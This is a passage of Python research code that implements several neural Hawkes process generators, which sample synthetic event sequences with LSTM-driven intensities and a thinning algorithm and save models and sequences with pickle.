self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + self.mu
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(self.mu)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_float = numpy.int32(32)
self.dim_time = self.dim_float
#
self.args = settings['args']
numpy.random.seed(
settings['seed_random']
)
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time, self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(
numpy.dot(
self.hidden_t, self.W_mu
)
)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_time = self.dim_float
numpy.random.seed(
settings['seed_random']
)
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
#
time_rep_t = self.hard_relu(
self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
)
time_rep_t = numpy.concatenate(
(
time_rep_t,
self.one_seq[-1][
'time_since_last_event'
][None]
), axis = 0
)
emb_time_t = numpy.dot(
time_rep_t, self.Emb_time
)
#
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time_scale'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'Threshold_time': numpy.copy(self.Threshold_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
